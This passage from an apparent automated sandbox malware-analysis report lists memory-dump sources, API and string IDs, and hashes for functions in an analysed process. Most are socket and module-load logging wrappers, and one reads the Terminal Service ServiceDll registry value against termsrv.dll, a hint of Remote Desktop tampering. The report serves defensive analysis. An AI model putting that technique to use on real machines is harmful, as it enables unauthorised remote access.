                                                                                                                  • Instruction Fuzzy Hash: 71F09A91F0EE0786FA01D79BA8008B012106F97FB4F1805F3C80E06374FE1CA5418300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastfflushfwriteshutdown
                                                                                                                  • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                                                                                                                  • API String ID: 2143829457-932964775
                                                                                                                  • Opcode ID: 1db78aa528ddbe588164316255f4897511fba48a89597079c99fa159a0828559
                                                                                                                  • Instruction ID: 01cd1b070d49ffc361cf489628fd61229a82288fc770fc9128f20f39db4858f7
                                                                                                                  • Opcode Fuzzy Hash: 1db78aa528ddbe588164316255f4897511fba48a89597079c99fa159a0828559
                                                                                                                  • Instruction Fuzzy Hash: D8F0B465F4CD03D1E6105757E8400BA27216FA3F71F5445F3D90D521B1EE2CA5468340
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                  • Opcode ID: 36203e6f37c63859e8e4abccedc21d8fb4a9e1d8d10a0d2725006cb0010dba7c
                                                                                                                  • Instruction ID: da476732b79ead9cf9574ddfb59001c5617359c0bb52621884a3d249138cefa6
                                                                                                                  • Opcode Fuzzy Hash: 36203e6f37c63859e8e4abccedc21d8fb4a9e1d8d10a0d2725006cb0010dba7c
                                                                                                                  • Instruction Fuzzy Hash: FAF0E215E0EE4785FF629797A8004B82B096F04BF0F4851F5CD0C6BB70EE9CA9858301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                  • Opcode ID: 5fbb28a5f4c7af40752bc095f375c462acbc214c46beb02d6261729f1a54ccff
                                                                                                                  • Instruction ID: b61386176c2584c8444e8ee932afc73a2809ceb6fea62dbf1d27c2ecf3099d5e
                                                                                                                  • Opcode Fuzzy Hash: 5fbb28a5f4c7af40752bc095f375c462acbc214c46beb02d6261729f1a54ccff
                                                                                                                  • Instruction Fuzzy Hash: 05F05E10E0EE5794EF11ABEBAC406B217685F05BA4F8864B1DD0D1B7B5FD1CB5868740
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastclosesocketfflushfwrite
                                                                                                                  • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                                                                                                                  • API String ID: 152032778-2221966578
                                                                                                                  • Opcode ID: 6a92f492fd295238fe9017506ac1bb62cf497e7a91884442c598b84fdbedccf9
                                                                                                                  • Instruction ID: 3218d7a389619007e7f7da9c90d8aab710824bda8e8f7de89cf15a9e2f07a11a
                                                                                                                  • Opcode Fuzzy Hash: 6a92f492fd295238fe9017506ac1bb62cf497e7a91884442c598b84fdbedccf9
                                                                                                                  • Instruction Fuzzy Hash: 26F03068F4CE03D1FA1097A7A8500B63651AF67FB9F2403F3D53E555F2AE2CA5468350
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Openstrcmpstrlen
                                                                                                                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
                                                                                                                  • API String ID: 679246061-1413152910
                                                                                                                  • Opcode ID: 8b43859d3751d4cfc2d3ca6901e27b712851a733f46dae56a8f51d62b50b9964
                                                                                                                  • Instruction ID: 3653dd31896772ff55e8e0ca07fa01887fd19eafee31a90a21426537afcb9d28
                                                                                                                  • Opcode Fuzzy Hash: 8b43859d3751d4cfc2d3ca6901e27b712851a733f46dae56a8f51d62b50b9964
                                                                                                                  • Instruction Fuzzy Hash: CB215171A1CE87C1EF349F12E440BFA6368AB50369F846072E69D825A9DF3CD545C640
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                  • Opcode ID: a1b16873526868662f2b8e44185e2007aaa97beb29f34de54a1bb7cc9e5aaaa1
                                                                                                                  • Instruction ID: 415217cbb904140da22fc26ab04095b0afd00ebb299407093a05ff544e3b0921
                                                                                                                  • Opcode Fuzzy Hash: a1b16873526868662f2b8e44185e2007aaa97beb29f34de54a1bb7cc9e5aaaa1
                                                                                                                  • Instruction Fuzzy Hash: 2BF0C861A0D903D7FB344F37A8009F55554AB84778F14A275DC2E837B4EE3CA946C701
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                  • Opcode ID: d6c6cff64ba4391655882ee9d1c052582818e9548b27ed4ccd3158a33180697f
                                                                                                                  • Instruction ID: 3ed1ef70f7ffe423058209463106d62282f886301ceb86f12347a4e9c1721ce2
                                                                                                                  • Opcode Fuzzy Hash: d6c6cff64ba4391655882ee9d1c052582818e9548b27ed4ccd3158a33180697f
                                                                                                                  • Instruction Fuzzy Hash: 45F0C861B0CD0342F310571FA8001BA5260AB95FB5F1451F3EC2E837B4DE3CE9568701
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                  • Opcode ID: a9dc1fb828fe4c8e7d762358f7092c09e209ec3cd2fcb4167166ce423b423755
                                                                                                                  • Instruction ID: c30cab630da52d931c4f21d65c5b39b952e1bcebd6bf9f165ccda5c4a20a4061
                                                                                                                  • Opcode Fuzzy Hash: a9dc1fb828fe4c8e7d762358f7092c09e209ec3cd2fcb4167166ce423b423755
                                                                                                                  • Instruction Fuzzy Hash: 76F062A1F089524AFB109B2BAC101A65261AB947B4F248271EC2D877F4EDBCAD468704
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                  • Opcode ID: d54fd1d00f3ce62bae67bc176a96361dc374be5219f58696e23c6c371c470f99
                                                                                                                  • Instruction ID: b3a93f26f7d6e68b3126581f2a483f57ad98e5b8b8b8662a9af72a0ac57c600d
                                                                                                                  • Opcode Fuzzy Hash: d54fd1d00f3ce62bae67bc176a96361dc374be5219f58696e23c6c371c470f99
                                                                                                                  • Instruction Fuzzy Hash: 3CF04F65B0CE0282F31057ABB8001B66561AF96BB5F6442F7ED1D877B4EE3C99468740
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                  • Opcode ID: 961ca19562558fabe8a6b4900f284c85b09b59eb7e1769bfcbbad23bf1c4c450
                                                                                                                  • Instruction ID: 2f0e7674710bf924579df8ae88129ae114bd449966d95e7c4e18a61b9db1edfa
                                                                                                                  • Opcode Fuzzy Hash: 961ca19562558fabe8a6b4900f284c85b09b59eb7e1769bfcbbad23bf1c4c450
                                                                                                                  • Instruction Fuzzy Hash: 04F0F661F1CD0282F31047ABA8001BD5669AB847B8F144275EC2E837B4EF7CD84A8701
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                  • Opcode ID: 2d33a153289c306b5fce3851330099b23ac3c9fe11635c37375803fd0bd15f23
                                                                                                                  • Instruction ID: c3059832a71ca8f3b37614c4c8419c76f4f62a31cc914f441e6dc103e457814d
                                                                                                                  • Opcode Fuzzy Hash: 2d33a153289c306b5fce3851330099b23ac3c9fe11635c37375803fd0bd15f23
                                                                                                                  • Instruction Fuzzy Hash: FFF0FC65F0CD4382F710AB9BAC002B75664AB84774F505171ED2D433F4DE3CE8468701
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                  • Opcode ID: bb85fe7d9bbd166f945c4a08f9790791af09f0990742d847ed14dacead1f49e5
                                                                                                                  • Instruction ID: ac50772d83d428f30fb51b8e7010b874192e3798e4ef9b71f1df103b81fab37e
                                                                                                                  • Opcode Fuzzy Hash: bb85fe7d9bbd166f945c4a08f9790791af09f0990742d847ed14dacead1f49e5
                                                                                                                  • Instruction Fuzzy Hash: 0DF04671A1C952CAE3204F27B800AEA6624AB88374F00A275ED1D837B4DF3CC949CB00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                  • Opcode ID: 1af1e0f93fc6dce75bcf80f41e8f45f96a1f3d4645fd1b1a6517dd7bb857d601
                                                                                                                  • Instruction ID: a55e822d218a9ba1518748e62ef43f6d2d0da5d9994a5362778c03ca8923bfb7
                                                                                                                  • Opcode Fuzzy Hash: 1af1e0f93fc6dce75bcf80f41e8f45f96a1f3d4645fd1b1a6517dd7bb857d601
                                                                                                                  • Instruction Fuzzy Hash: 21F0F6A1B0C9028AF3105B2BA8001BA2560AB84F74F1492B2ED1D837F5DE3CD94AC700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                  • Opcode ID: 055a0c70a428fe6926c8e8ec0572a1c3b8ade905bdfd7429ac0047fc9d7c99a5
                                                                                                                  • Instruction ID: e23dbd5dd46a9a181e9f03d395da1b0b0516c3f649c72da7c3293afac4c6cb89
                                                                                                                  • Opcode Fuzzy Hash: 055a0c70a428fe6926c8e8ec0572a1c3b8ade905bdfd7429ac0047fc9d7c99a5
                                                                                                                  • Instruction Fuzzy Hash: DFF09661B089428AE7109B2BBC105E66661FB887B4F444275ED6D837F8DEBCD94ACB04
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                  • Opcode ID: aa119e89f4cc117f97de9b41f4a7a358675354a59165b15ce94db769aa347d17
                                                                                                                  • Instruction ID: 44200e2ba893f2459427cf218dcbdf597211b0205993e634ee707723bdd489d5
                                                                                                                  • Opcode Fuzzy Hash: aa119e89f4cc117f97de9b41f4a7a358675354a59165b15ce94db769aa347d17
                                                                                                                  • Instruction Fuzzy Hash: 53F0C265B0CA4286F3109B57B8002B66661BBD5BB4F1082F7ED2D837B4DA3CD94A8B00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                  • Opcode ID: 7b795b1efa713698dddd8c652ee4b9cd6c6e1b3637f4f8b0fd21ab21002727b0
                                                                                                                  • Instruction ID: e4968bfd1d1c0b5982369e486cef248462d4029e97222aed336656265340140a
